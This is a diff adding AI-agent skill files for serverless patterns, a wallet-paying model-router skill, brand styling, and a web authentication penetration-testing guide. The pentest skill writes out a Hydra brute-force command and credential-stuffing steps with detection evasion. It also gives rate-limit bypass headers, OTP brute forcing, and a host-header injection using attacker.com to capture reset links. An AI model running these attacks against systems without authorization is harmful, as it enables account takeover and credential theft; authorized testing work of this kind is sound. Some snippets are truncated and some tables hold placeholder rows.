deadLetterTargetArn: !GetAtt DeadLetterQueue.Arn
|
||||
maxReceiveCount: 3
|
||||
|
||||
DeadLetterQueue:
|
||||
Type: AWS::SQS::Queue
|
||||
Properties:
|
||||
MessageRetentionPeriod: 1209600 # 14 days
|
||||
```
|
||||
|
||||
```javascript
|
||||
// src/handlers/processor.js
|
||||
exports.handler = async (event) => {
|
||||
const batchItemFailures = [];
|
||||
|
||||
for (const record of event.Records) {
|
||||
try {
|
||||
const body = JSON.parse(record.body);
|
||||
await processMessage(body);
|
||||
} catch (error) {
|
||||
console.error(`Failed to process message ${record.messageId}:`, error);
|
||||
// Report this item as failed (will be retried)
|
||||
batchItemFailures.push({
|
||||
itemIdentifier: record.messageId
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
// Return failed items for retry
|
||||
return { batchItemFailures };
|
||||
};
|
||||
|
||||
async function processMessage(message) {
|
||||
// Your processing logic
|
||||
console.log('Processing:', message);
|
||||
|
||||
// Simulate work
|
||||
await saveToDatabase(message);
|
||||
}
|
||||
```
|
||||
|
||||
```python
|
||||
# Python version
|
||||
import json
|
||||
import logging
|
||||
|
||||
logger = logging.getLogger()
|
||||
|
||||
def handler(event, context):
|
||||
batch_item_failures = []
|
||||
|
||||
for record in event['Records']:
|
||||
try:
|
||||
body = json.loads(record['body'])
|
||||
process_message(body)
|
||||
except Exception as e:
|
||||
logger.error(f"Failed to process {record['messageId']}: {e}")
|
||||
batch_item_failures.append({
|
||||
'itemIdentifier': record['messageId']
|
||||
})
|
||||
|
||||
return {'batchItemFailures': batch_ite
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Monolithic Lambda
|
||||
|
||||
**Why bad**: Large deployment packages cause slow cold starts.
|
||||
Hard to scale individual operations.
|
||||
Updates affect entire system.
|
||||
|
||||
### ❌ Large Dependencies
|
||||
|
||||
**Why bad**: Increases deployment package size.
|
||||
Slows down cold starts significantly.
|
||||
Most of SDK/library may be unused.
|
||||
|
||||
### ❌ Synchronous Calls in VPC
|
||||
|
||||
**Why bad**: VPC-attached Lambdas have ENI setup overhead.
|
||||
Blocking DNS lookups or connections worsen cold starts.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | high | ## Measure your INIT phase |
|
||||
| Issue | high | ## Set appropriate timeout |
|
||||
| Issue | high | ## Increase memory allocation |
|
||||
| Issue | medium | ## Verify VPC configuration |
|
||||
| Issue | medium | ## Tell Lambda not to wait for event loop |
|
||||
| Issue | medium | ## For large file uploads |
|
||||
| Issue | high | ## Use different buckets/prefixes |
|
||||
42
skills/azure-functions/SKILL.md
Normal file
42
skills/azure-functions/SKILL.md
Normal file
@@ -0,0 +1,42 @@
|
||||
---
|
||||
name: azure-functions
|
||||
description: "Expert patterns for Azure Functions development including isolated worker model, Durable Functions orchestration, cold start optimization, and production patterns. Covers .NET, Python, and Node.js programming models. Use when: azure function, azure functions, durable functions, azure serverless, function app."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Azure Functions
|
||||
|
||||
## Patterns
|
||||
|
||||
### Isolated Worker Model (.NET)
|
||||
|
||||
Modern .NET execution model with process isolation
|
||||
|
||||
### Node.js v4 Programming Model
|
||||
|
||||
Modern code-centric approach for TypeScript/JavaScript
|
||||
|
||||
### Python v2 Programming Model
|
||||
|
||||
Decorator-based approach for Python functions
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Blocking Async Calls
|
||||
|
||||
### ❌ New HttpClient Per Request
|
||||
|
||||
### ❌ In-Process Model for New Projects
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | high | ## Use async pattern with Durable Functions |
|
||||
| Issue | high | ## Use IHttpClientFactory (Recommended) |
|
||||
| Issue | high | ## Always use async/await |
|
||||
| Issue | medium | ## Configure maximum timeout (Consumption) |
|
||||
| Issue | high | ## Use isolated worker for new projects |
|
||||
| Issue | medium | ## Configure Application Insights properly |
|
||||
| Issue | medium | ## Check extension bundle (most common) |
|
||||
| Issue | medium | ## Add warmup trigger to initialize your code |
|
||||
292
skills/blockrun/SKILL.md
Normal file
292
skills/blockrun/SKILL.md
Normal file
@@ -0,0 +1,292 @@
|
||||
---
|
||||
name: blockrun
|
||||
description: Use when user needs capabilities Claude lacks (image generation, real-time X/Twitter data) or explicitly requests external models ("blockrun", "use grok", "use gpt", "dall-e", "deepseek")
|
||||
allowed-tools: Read, Bash(python:*), Bash(python3:*), Bash(pip:*), Bash(source:*)
|
||||
---
|
||||
|
||||
# BlockRun
|
||||
|
||||
**BlockRun works with Claude Code and Google Antigravity.**
|
||||
|
||||
You can't generate images. You have no real-time X/Twitter access. BlockRun gives you these capabilities.
|
||||
|
||||
## Philosophy
|
||||
|
||||
You have a wallet. When you need a capability you lack, you pay for it autonomously.
|
||||
|
||||
| You Need | You Call | Pricing |
|
||||
|----------|----------|---------|
|
||||
| Image generation | DALL-E | $0.04/image |
|
||||
| Real-time X data | Grok + Live Search | $0.025/source |
|
||||
| Second opinion | GPT-5.2 | $1.75/M input, $14/M output |
|
||||
| Cheaper processing | DeepSeek | $0.14/M input, $0.28/M output |
|
||||
|
||||
**How it works:** BlockRun uses x402 micropayments to route your requests to OpenAI, xAI, Google, and other providers. No API keys needed - your wallet pays per token.
|
||||
|
||||
## Budget Control (Optional)
|
||||
|
||||
If the user specifies a budget (e.g., "use at most $1"), track spending and stop when budget is reached:
|
||||
|
||||
```python
|
||||
from blockrun_llm import setup_agent_wallet
|
||||
|
||||
client = setup_agent_wallet()
|
||||
budget = 1.0 # User's budget
|
||||
|
||||
# Before each call, check if within budget
|
||||
spending = client.get_spending()
|
||||
if spending['total_usd'] >= budget:
|
||||
print(f"Budget reached: ${spending['total_usd']:.4f} spent")
|
||||
# Stop making calls
|
||||
else:
|
||||
response = client.chat("openai/gpt-5.2", "Hello!")
|
||||
|
||||
# At the end, report spending
|
||||
spending = client.get_spending()
|
||||
print(f"💰 Total spent: ${spending['total_usd']:.4f} across {spending['calls']} calls")
|
||||
```
|
||||
|
||||
## When to Use
|
||||
|
||||
| Trigger | Your Action |
|
||||
|---------|-------------|
|
||||
| User explicitly requests ("blockrun second opinion with GPT on...", "use grok to check...", "generate image with dall-e") | Execute via BlockRun |
|
||||
| User needs something you can't do (images, live X data) | Suggest BlockRun, wait for confirmation |
|
||||
| You can handle the task fine | Do it yourself, don't mention BlockRun |
|
||||
|
||||
## Example User Prompts
|
||||
|
||||
Users will say things like:
|
||||
|
||||
| User Says | What You Do |
|
||||
|-----------|-------------|
|
||||
| "blockrun generate an image of a sunset" | Call DALL-E via ImageClient |
|
||||
| "use grok to check what's trending on X" | Call Grok with `search=True` |
|
||||
| "blockrun GPT review this code" | Call GPT-5.2 via LLMClient |
|
||||
| "what's the latest news about AI agents?" | Suggest Grok (you lack real-time data) |
|
||||
| "generate a logo for my startup" | Suggest DALL-E (you can't generate images) |
|
||||
| "blockrun check my balance" | Show wallet balance via `get_balance()` |
|
||||
| "blockrun deepseek summarize this file" | Call DeepSeek for cost savings |
|
||||
|
||||
## Wallet & Balance
|
||||
|
||||
Use `setup_agent_wallet()` to auto-create a wallet and get a client. This shows the QR code and welcome message on first use.
|
||||
|
||||
**Initialize client (always start with this):**
|
||||
```python
|
||||
from blockrun_llm import setup_agent_wallet
|
||||
|
||||
client = setup_agent_wallet() # Auto-creates wallet, shows QR if new
|
||||
```
|
||||
|
||||
**Check balance (when user asks "show balance", "check wallet", etc.):**
|
||||
```python
|
||||
balance = client.get_balance() # On-chain USDC balance
|
||||
print(f"Balance: ${balance:.2f} USDC")
|
||||
print(f"Wallet: {client.get_wallet_address()}")
|
||||
```
|
||||
|
||||
**Show QR code for funding:**
|
||||
```python
|
||||
from blockrun_llm import generate_wallet_qr_ascii, get_wallet_address
|
||||
|
||||
# ASCII QR for terminal display
|
||||
print(generate_wallet_qr_ascii(get_wallet_address()))
|
||||
```
|
||||
|
||||
## SDK Usage
|
||||
|
||||
**Prerequisite:** Install the SDK with `pip install blockrun-llm`
|
||||
|
||||
### Basic Chat
|
||||
```python
|
||||
from blockrun_llm import setup_agent_wallet
|
||||
|
||||
client = setup_agent_wallet() # Auto-creates wallet if needed
|
||||
response = client.chat("openai/gpt-5.2", "What is 2+2?")
|
||||
print(response)
|
||||
|
||||
# Check spending
|
||||
spending = client.get_spending()
|
||||
print(f"Spent ${spending['total_usd']:.4f}")
|
||||
```
|
||||
|
||||
### Real-time X/Twitter Search (xAI Live Search)
|
||||
|
||||
**IMPORTANT:** For real-time X/Twitter data, you MUST enable Live Search with `search=True` or `search_parameters`.
|
||||
|
||||
```python
|
||||
from blockrun_llm import setup_agent_wallet
|
||||
|
||||
client = setup_agent_wallet()
|
||||
|
||||
# Simple: Enable live search with search=True
|
||||
response = client.chat(
|
||||
"xai/grok-3",
|
||||
"What are the latest posts from @blockrunai on X?",
|
||||
search=True # Enables real-time X/Twitter search
|
||||
)
|
||||
print(response)
|
||||
```
|
||||
|
||||
### Advanced X Search with Filters
|
||||
|
||||
```python
|
||||
from blockrun_llm import setup_agent_wallet
|
||||
|
||||
client = setup_agent_wallet()
|
||||
|
||||
response = client.chat(
|
||||
"xai/grok-3",
|
||||
"Analyze @blockrunai's recent content and engagement",
|
||||
search_parameters={
|
||||
"mode": "on",
|
||||
"sources": [
|
||||
{
|
||||
"type": "x",
|
||||
"included_x_handles": ["blockrunai"],
|
||||
"post_favorite_count": 5
|
||||
}
|
||||
],
|
||||
"max_search_results": 20,
|
||||
"return_citations": True
|
||||
}
|
||||
)
|
||||
print(response)
|
||||
```
|
||||
|
||||
### Image Generation
|
||||
```python
|
||||
from blockrun_llm import ImageClient
|
||||
|
||||
client = ImageClient()
|
||||
result = client.generate("A cute cat wearing a space helmet")
|
||||
print(result.data[0].url)
|
||||
```
|
||||
|
||||
## xAI Live Search Reference
|
||||
|
||||
Live Search is xAI's real-time data API. Cost: **$0.025 per source** (default 10 sources = ~$0.26).
|
||||
|
||||
To reduce costs, set `max_search_results` to a lower value:
|
||||
```python
|
||||
# Only use 5 sources (~$0.13)
|
||||
response = client.chat("xai/grok-3", "What's trending?",
|
||||
search_parameters={"mode": "on", "max_search_results": 5})
|
||||
```
|
||||
|
||||
### Search Parameters
|
||||
|
||||
| Parameter | Type | Default | Description |
|
||||
|-----------|------|---------|-------------|
|
||||
| `mode` | string | "auto" | "off", "auto", or "on" |
|
||||
| `sources` | array | web,news,x | Data sources to query |
|
||||
| `return_citations` | bool | true | Include source URLs |
|
||||
| `from_date` | string | - | Start date (YYYY-MM-DD) |
|
||||
| `to_date` | string | - | End date (YYYY-MM-DD) |
|
||||
| `max_search_results` | int | 10 | Max sources to return (customize to control cost) |
|
||||
|
||||
### Source Types
|
||||
|
||||
**X/Twitter Source:**
|
||||
```python
|
||||
{
|
||||
"type": "x",
|
||||
"included_x_handles": ["handle1", "handle2"], # Max 10
|
||||
"excluded_x_handles": ["spam_account"], # Max 10
|
||||
"post_favorite_count": 100, # Min likes threshold
|
||||
"post_view_count": 1000 # Min views threshold
|
||||
}
|
||||
```
|
||||
|
||||
**Web Source:**
|
||||
```python
|
||||
{
|
||||
"type": "web",
|
||||
"country": "US", # ISO alpha-2 code
|
||||
"allowed_websites": ["example.com"], # Max 5
|
||||
"safe_search": True
|
||||
}
|
||||
```
|
||||
|
||||
**News Source:**
|
||||
```python
|
||||
{
|
||||
"type": "news",
|
||||
"country": "US",
|
||||
"excluded_websites": ["tabloid.com"] # Max 5
|
||||
}
|
||||
```
|
||||
|
||||
## Available Models
|
||||
|
||||
| Model | Best For | Pricing |
|
||||
|-------|----------|---------|
|
||||
| `openai/gpt-5.2` | Second opinions, code review, general | $1.75/M in, $14/M out |
|
||||
| `openai/gpt-5-mini` | Cost-optimized reasoning | $0.30/M in, $1.20/M out |
|
||||
| `openai/o4-mini` | Latest efficient reasoning | $1.10/M in, $4.40/M out |
|
||||
| `openai/o3` | Advanced reasoning, complex problems | $10/M in, $40/M out |
|
||||
| `xai/grok-3` | Real-time X/Twitter data | $3/M + $0.025/source |
|
||||
| `deepseek/deepseek-chat` | Simple tasks, bulk processing | $0.14/M in, $0.28/M out |
|
||||
| `google/gemini-2.5-flash` | Very long documents, fast | $0.15/M in, $0.60/M out |
|
||||
| `openai/dall-e-3` | Photorealistic images | $0.04/image |
|
||||
| `google/nano-banana` | Fast, artistic images | $0.01/image |
|
||||
|
||||
*M = million tokens. Actual cost depends on your prompt and response length.*
|
||||
|
||||
## Cost Reference
|
||||
|
||||
All LLM costs are per million tokens (M = 1,000,000 tokens).
|
||||
|
||||
| Model | Input | Output |
|
||||
|-------|-------|--------|
|
||||
| GPT-5.2 | $1.75/M | $14.00/M |
|
||||
| GPT-5-mini | $0.30/M | $1.20/M |
|
||||
| Grok-3 (no search) | $3.00/M | $15.00/M |
|
||||
| DeepSeek | $0.14/M | $0.28/M |
|
||||
|
||||
| Fixed Cost Actions | |
|
||||
|-------|--------|
|
||||
| Grok Live Search | $0.025/source (default 10 = $0.25) |
|
||||
| DALL-E image | $0.04/image |
|
||||
| Nano Banana image | $0.01/image |
|
||||
|
||||
**Typical costs:** A 500-word prompt (~750 tokens) to GPT-5.2 costs ~$0.001 input. A 1000-word response (~1500 tokens) costs ~$0.02 output.
|
||||
|
||||
## Setup & Funding
|
||||
|
||||
**Wallet location:** `$HOME/.blockrun/.session` (e.g., `/Users/username/.blockrun/.session`)
|
||||
|
||||
**First-time setup:**
|
||||
1. Wallet auto-creates when `setup_agent_wallet()` is called
|
||||
2. Check wallet and balance:
|
||||
```python
|
||||
from blockrun_llm import setup_agent_wallet
|
||||
client = setup_agent_wallet()
|
||||
print(f"Wallet: {client.get_wallet_address()}")
|
||||
print(f"Balance: ${client.get_balance():.2f} USDC")
|
||||
```
|
||||
3. Fund wallet with $1-5 USDC on Base network
|
||||
|
||||
**Show QR code for funding (ASCII for terminal):**
|
||||
```python
|
||||
from blockrun_llm import generate_wallet_qr_ascii, get_wallet_address
|
||||
print(generate_wallet_qr_ascii(get_wallet_address()))
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
**"Grok says it has no real-time access"**
|
||||
→ You forgot to enable Live Search. Add `search=True`:
|
||||
```python
|
||||
response = client.chat("xai/grok-3", "What's trending?", search=True)
|
||||
```
|
||||
|
||||
**Module not found**
|
||||
→ Install the SDK: `pip install blockrun-llm`
|
||||
|
||||
## Updates
|
||||
|
||||
```bash
|
||||
pip install --upgrade blockrun-llm
|
||||
```
|
||||
73
skills/brand-guidelines-community/SKILL.md
Normal file
73
skills/brand-guidelines-community/SKILL.md
Normal file
@@ -0,0 +1,73 @@
|
||||
---
|
||||
name: brand-guidelines
|
||||
description: Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. Use it when brand colors or style guidelines, visual formatting, or company design standards apply.
|
||||
license: Complete terms in LICENSE.txt
|
||||
---
|
||||
|
||||
# Anthropic Brand Styling
|
||||
|
||||
## Overview
|
||||
|
||||
To access Anthropic's official brand identity and style resources, use this skill.
|
||||
|
||||
**Keywords**: branding, corporate identity, visual identity, post-processing, styling, brand colors, typography, Anthropic brand, visual formatting, visual design
|
||||
|
||||
## Brand Guidelines
|
||||
|
||||
### Colors
|
||||
|
||||
**Main Colors:**
|
||||
|
||||
- Dark: `#141413` - Primary text and dark backgrounds
|
||||
- Light: `#faf9f5` - Light backgrounds and text on dark
|
||||
- Mid Gray: `#b0aea5` - Secondary elements
|
||||
- Light Gray: `#e8e6dc` - Subtle backgrounds
|
||||
|
||||
**Accent Colors:**
|
||||
|
||||
- Orange: `#d97757` - Primary accent
|
||||
- Blue: `#6a9bcc` - Secondary accent
|
||||
- Green: `#788c5d` - Tertiary accent
|
||||
|
||||
### Typography
|
||||
|
||||
- **Headings**: Poppins (with Arial fallback)
|
||||
- **Body Text**: Lora (with Georgia fallback)
|
||||
- **Note**: Fonts should be pre-installed in your environment for best results
|
||||
|
||||
## Features
|
||||
|
||||
### Smart Font Application
|
||||
|
||||
- Applies Poppins font to headings (24pt and larger)
|
||||
- Applies Lora font to body text
|
||||
- Automatically falls back to Arial/Georgia if custom fonts unavailable
|
||||
- Preserves readability across all systems
|
||||
|
||||
### Text Styling
|
||||
|
||||
- Headings (24pt+): Poppins font
|
||||
- Body text: Lora font
|
||||
- Smart color selection based on background
|
||||
- Preserves text hierarchy and formatting
|
||||
|
||||
### Shape and Accent Colors
|
||||
|
||||
- Non-text shapes use accent colors
|
||||
- Cycles through orange, blue, and green accents
|
||||
- Maintains visual interest while staying on-brand
|
||||
|
||||
## Technical Details
|
||||
|
||||
### Font Management
|
||||
|
||||
- Uses system-installed Poppins and Lora fonts when available
|
||||
- Provides automatic fallback to Arial (headings) and Georgia (body)
|
||||
- No font installation required - works with existing system fonts
|
||||
- For best results, pre-install Poppins and Lora fonts in your environment
|
||||
|
||||
### Color Application
|
||||
|
||||
- Uses RGB color values for precise brand matching
|
||||
- Applied via python-pptx's RGBColor class
|
||||
- Maintains color fidelity across different systems
|
||||
473
skills/broken-authentication/SKILL.md
Normal file
473
skills/broken-authentication/SKILL.md
Normal file
@@ -0,0 +1,473 @@
|
||||
---
|
||||
name: Broken Authentication Testing
|
||||
description: This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". It provides comprehensive techniques for identifying authentication and session management weaknesses in web applications.
|
||||
---
|
||||
|
||||
# Broken Authentication Testing
|
||||
|
||||
## Purpose
|
||||
|
||||
Identify and exploit authentication and session management vulnerabilities in web applications. Broken authentication consistently ranks in the OWASP Top 10 and can lead to account takeover, identity theft, and unauthorized access to sensitive systems. This skill covers testing methodologies for password policies, session handling, multi-factor authentication, and credential management.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
### Required Knowledge
|
||||
- HTTP protocol and session mechanisms
|
||||
- Authentication types (SFA, 2FA, MFA)
|
||||
- Cookie and token handling
|
||||
- Common authentication frameworks
|
||||
|
||||
### Required Tools
|
||||
- Burp Suite Professional or Community
|
||||
- Hydra or similar brute-force tools
|
||||
- Custom wordlists for credential testing
|
||||
- Browser developer tools
|
||||
|
||||
### Required Access
|
||||
- Target application URL
|
||||
- Test account credentials
|
||||
- Written authorization for testing
|
||||
|
||||
## Outputs and Deliverables
|
||||
|
||||
1. **Authentication Assessment Report** - Document all identified vulnerabilities
|
||||
2. **Credential Testing Results** - Brute-force and dictionary attack outcomes
|
||||
3. **Session Security Analysis** - Token randomness and timeout evaluation
|
||||
4. **Remediation Recommendations** - Security hardening guidance
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: Authentication Mechanism Analysis
|
||||
|
||||
Understand the application's authentication architecture:
|
||||
|
||||
```
|
||||
# Identify authentication type
|
||||
- Password-based (forms, basic auth, digest)
|
||||
- Token-based (JWT, OAuth, API keys)
|
||||
- Certificate-based (mutual TLS)
|
||||
- Multi-factor (SMS, TOTP, hardware tokens)
|
||||
|
||||
# Map authentication endpoints
|
||||
/login, /signin, /authenticate
|
||||
/register, /signup
|
||||
/forgot-password, /reset-password
|
||||
/logout, /signout
|
||||
/api/auth/*, /oauth/*
|
||||
```
|
||||
|
||||
Capture and analyze authentication requests:
|
||||
|
||||
```http
|
||||
POST /login HTTP/1.1
|
||||
Host: target.com
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=test&password=test123
|
||||
```
|
||||
|
||||
### Phase 2: Password Policy Testing
|
||||
|
||||
Evaluate password requirements and enforcement:
|
||||
|
||||
```bash
|
||||
# Test minimum length (a, ab, abcdefgh)
|
||||
# Test complexity (password, password1, Password1!)
|
||||
# Test common weak passwords (123456, password, qwerty, admin)
|
||||
# Test username as password (admin/admin, test/test)
|
||||
```
|
||||
|
||||
Document policy gaps: Minimum length <8, no complexity, common passwords allowed, username as password.
|
||||
|
||||
### Phase 3: Credential Enumeration
|
||||
|
||||
Test for username enumeration vulnerabilities:
|
||||
|
||||
```bash
|
||||
# Compare responses for valid vs invalid usernames
|
||||
# Invalid: "Invalid username" vs Valid: "Invalid password"
|
||||
# Check timing differences, response codes, registration messages
|
||||
```
|
||||
|
||||
# Password reset
|
||||
"Email sent if account exists" (secure)
|
||||
"No account with that email" (leaks info)
|
||||
|
||||
# API responses
|
||||
{"error": "user_not_found"}
|
||||
{"error": "invalid_password"}
|
||||
```
|
||||
|
||||
### Phase 4: Brute Force Testing
|
||||
|
||||
Test account lockout and rate limiting:
|
||||
|
||||
```bash
|
||||
# Using Hydra for form-based auth
|
||||
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
|
||||
target.com http-post-form \
|
||||
"/login:username=^USER^&password=^PASS^:Invalid credentials"
|
||||
|
||||
# Using Burp Intruder
|
||||
1. Capture login request
|
||||
2. Send to Intruder
|
||||
3. Set payload positions on password field
|
||||
4. Load wordlist
|
||||
5. Start attack
|
||||
6. Analyze response lengths/codes
|
||||
```
|
||||
|
||||
Check for protections:
|
||||
|
||||
```bash
|
||||
# Account lockout
|
||||
- After how many attempts?
|
||||
- Duration of lockout?
|
||||
- Lockout notification?
|
||||
|
||||
# Rate limiting
|
||||
- Requests per minute limit?
|
||||
- IP-based or account-based?
|
||||
- Bypass via headers (X-Forwarded-For)?
|
||||
|
||||
# CAPTCHA
|
||||
- After failed attempts?
|
||||
- Easily bypassable?
|
||||
```
|
||||
|
||||
### Phase 5: Credential Stuffing
|
||||
|
||||
Test with known breached credentials:
|
||||
|
||||
```bash
|
||||
# Credential stuffing differs from brute force
|
||||
# Uses known email:password pairs from breaches
|
||||
|
||||
# Using Burp Intruder with Pitchfork attack
|
||||
1. Set username and password as positions
|
||||
2. Load email list as payload 1
|
||||
3. Load password list as payload 2 (matched pairs)
|
||||
4. Analyze for successful logins
|
||||
|
||||
# Detection evasion
|
||||
- Slow request rate
|
||||
- Rotate source IPs
|
||||
- Randomize user agents
|
||||
- Add delays between attempts
|
||||
```
|
||||
|
||||
### Phase 6: Session Management Testing
|
||||
|
||||
Analyze session token security:
|
||||
|
||||
```bash
|
||||
# Capture session cookie
|
||||
Cookie: SESSIONID=abc123def456
|
||||
|
||||
# Test token characteristics
|
||||
1. Entropy - Is it random enough?
|
||||
2. Length - Sufficient length (128+ bits)?
|
||||
3. Predictability - Sequential patterns?
|
||||
4. Secure flags - HttpOnly, Secure, SameSite?
|
||||
```
|
||||
|
||||
Session token analysis:
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
import requests
|
||||
import hashlib
|
||||
|
||||
# Collect multiple session tokens
|
||||
tokens = []
|
||||
for i in range(100):
|
||||
response = requests.get("https://target.com/login")
|
||||
token = response.cookies.get("SESSIONID")
|
||||
tokens.append(token)
|
||||
|
||||
# Analyze for patterns
|
||||
# Check for sequential increments
|
||||
# Calculate entropy
|
||||
# Look for timestamp components
|
||||
```
|
||||
|
||||
### Phase 7: Session Fixation Testing
|
||||
|
||||
Test if session is regenerated after authentication:
|
||||
|
||||
```bash
|
||||
# Step 1: Get session before login
|
||||
GET /login HTTP/1.1
|
||||
Response: Set-Cookie: SESSIONID=abc123
|
||||
|
||||
# Step 2: Login with same session
|
||||
POST /login HTTP/1.1
|
||||
Cookie: SESSIONID=abc123
|
||||
username=valid&password=valid
|
||||
|
||||
# Step 3: Check if session changed
|
||||
# VULNERABLE if SESSIONID remains abc123
|
||||
# SECURE if new session assigned after login
|
||||
```
|
||||
|
||||
Attack scenario:
|
||||
|
||||
```bash
|
||||
# Attacker workflow:
|
||||
1. Attacker visits site, gets session: SESSIONID=attacker_session
|
||||
2. Attacker sends link to victim with fixed session:
|
||||
https://target.com/login?SESSIONID=attacker_session
|
||||
3. Victim logs in with attacker's session
|
||||
4. Attacker now has authenticated session
|
||||
```
|
||||
|
||||
### Phase 8: Session Timeout Testing
|
||||
|
||||
Verify session expiration policies:
|
||||
|
||||
```bash
|
||||
# Test idle timeout
|
||||
1. Login and note session cookie
|
||||
2. Wait without activity (15, 30, 60 minutes)
|
||||
3. Attempt to use session
|
||||
4. Check if session is still valid
|
||||
|
||||
# Test absolute timeout
|
||||
1. Login and continuously use session
|
||||
2. Check if forced logout after set period (8 hours, 24 hours)
|
||||
|
||||
# Test logout functionality
|
||||
1. Login and note session
|
||||
2. Click logout
|
||||
3. Attempt to reuse old session cookie
|
||||
4. Session should be invalidated server-side
|
||||
```
|
||||
|
||||
### Phase 9: Multi-Factor Authentication Testing
|
||||
|
||||
Assess MFA implementation security:
|
||||
|
||||
```bash
|
||||
# OTP brute force
|
||||
- 4-digit OTP = 10,000 combinations
|
||||
- 6-digit OTP = 1,000,000 combinations
|
||||
- Test rate limiting on OTP endpoint
|
||||
|
||||
# OTP bypass techniques
|
||||
- Skip MFA step by direct URL access
|
||||
- Modify response to indicate MFA passed
|
||||
- Null/empty OTP submission
|
||||
- Previous valid OTP reuse
|
||||
|
||||
# API Version Downgrade Attack (crAPI example)
|
||||
# If /api/v3/check-otp has rate limiting, try older versions:
|
||||
POST /api/v2/check-otp
|
||||
{"otp": "1234"}
|
||||
# Older API versions may lack security controls
|
||||
|
||||
# Using Burp for OTP testing
|
||||
1. Capture OTP verification request
|
||||
2. Send to Intruder
|
||||
3. Set OTP field as payload position
|
||||
4. Use numbers payload (0000-9999)
|
||||
5. Check for successful bypass
|
||||
```
|
||||
|
||||
Test MFA enrollment:
|
||||
|
||||
```bash
|
||||
# Forced enrollment
|
||||
- Can MFA be skipped during setup?
|
||||
- Can backup codes be accessed without verification?
|
||||
|
||||
# Recovery process
|
||||
- Can MFA be disabled via email alone?
|
||||
- Social engineering potential?
|
||||
```
|
||||
|
||||
### Phase 10: Password Reset Testing
|
||||
|
||||
Analyze password reset security:
|
||||
|
||||
```bash
|
||||
# Token security
|
||||
1. Request password reset
|
||||
2. Capture reset link
|
||||
3. Analyze token:
|
||||
- Length and randomness
|
||||
- Expiration time
|
||||
- Single-use enforcement
|
||||
- Account binding
|
||||
|
||||
# Token manipulation
|
||||
https://target.com/reset?token=abc123&user=victim
|
||||
# Try changing user parameter while using valid token
|
||||
|
||||
# Host header injection
|
||||
POST /forgot-password HTTP/1.1
|
||||
Host: attacker.com
|
||||
email=victim@email.com
|
||||
# Reset email may contain attacker's domain
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Common Vulnerability Types
|
||||
|
||||
| Vulnerability | Risk | Test Method |
|
||||
|--------------|------|-------------|
|
||||
| Weak passwords | High | Policy testing, dictionary attack |
|
||||
| No lockout | High | Brute force testing |
|
||||
| Username enumeration | Medium | Differential response analysis |
|
||||
| Session fixation | High | Pre/post-login session comparison |
|
||||
| Weak session tokens | High | Entropy analysis |
|
||||
| No session timeout | Medium | Long-duration session testing |
|
||||
| Insecure password reset | High | Token analysis, workflow bypass |
|
||||
| MFA bypass | Critical | Direct access, response manipulation |
|
||||
|
||||
### Credential Testing Payloads
|
||||
|
||||
```bash
|
||||
# Default credentials
|
||||
admin:admin
|
||||
admin:password
|
||||
admin:123456
|
||||
root:root
|
||||
test:test
|
||||
user:user
|
||||
|
||||
# Common passwords
|
||||
123456
|
||||
password
|
||||
12345678
|
||||
qwerty
|
||||
abc123
|
||||
password1
|
||||
admin123
|
||||
|
||||
# Breached credential databases
|
||||
- Have I Been Pwned dataset
|
||||
- SecLists passwords
|
||||
- Custom targeted lists
|
||||
```
|
||||
|
||||
### Session Cookie Flags
|
||||
|
||||
| Flag | Purpose | Vulnerability if Missing |
|
||||
|------|---------|------------------------|
|
||||
| HttpOnly | Prevent JS access | XSS can steal session |
|
||||
| Secure | HTTPS only | Sent over HTTP |
|
||||
| SameSite | CSRF protection | Cross-site requests allowed |
|
||||
| Path | URL scope | Broader exposure |
|
||||
| Domain | Domain scope | Subdomain access |
|
||||
| Expires | Lifetime | Persistent sessions |
|
||||
|
||||
### Rate Limiting Bypass Headers
|
||||
|
||||
```http
|
||||
X-Forwarded-For: 127.0.0.1
|
||||
X-Real-IP: 127.0.0.1
|
||||
X-Originating-IP: 127.0.0.1
|
||||
X-Client-IP: 127.0.0.1
|
||||
X-Remote-IP: 127.0.0.1
|
||||
True-Client-IP: 127.0.0.1
|
||||
```
|
||||
|
||||
## Constraints and Limitations
|
||||
|
||||
### Legal Requirements
|
||||
- Only test with explicit written authorization
|
||||
- Avoid testing with real breached credentials
|
||||
- Do not access actual user accounts
|
||||
- Document all testing activities
|
||||
|
||||
### Technical Limitations
|
||||
- CAPTCHA may prevent automated testing
|
||||
- Rate limiting affects brute force timing
|
||||
- MFA significantly increases attack difficulty
|
||||
- Some vulnerabilities require victim interaction
|
||||
|
||||
### Scope Considerations
|
||||
- Test accounts may behave differently than production
|
||||
- Some features may be disabled in test environments
|
||||
- Third-party authentication may be out of scope
|
||||
- Production testing requires extra caution
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Account Lockout Bypass
|
||||
|
||||
**Scenario:** Test if account lockout can be bypassed
|
||||
|
||||
```bash
|
||||
# Step 1: Identify lockout threshold
|
||||
# Try 5 wrong passwords for admin account
|
||||
# Result: "Account locked for 30 minutes"
|
||||
|
||||
# Step 2: Test bypass via IP rotation
|
||||
# Use X-Forwarded-For header
|
||||
POST /login HTTP/1.1
|
||||
X-Forwarded-For: 192.168.1.1
|
||||
username=admin&password=attempt1
|
||||
|
||||
# Increment IP for each attempt
|
||||
X-Forwarded-For: 192.168.1.2
|
||||
# Continue until successful or confirmed blocked
|
||||
|
||||
# Step 3: Test bypass via case manipulation
|
||||
username=Admin (vs admin)
|
||||
username=ADMIN
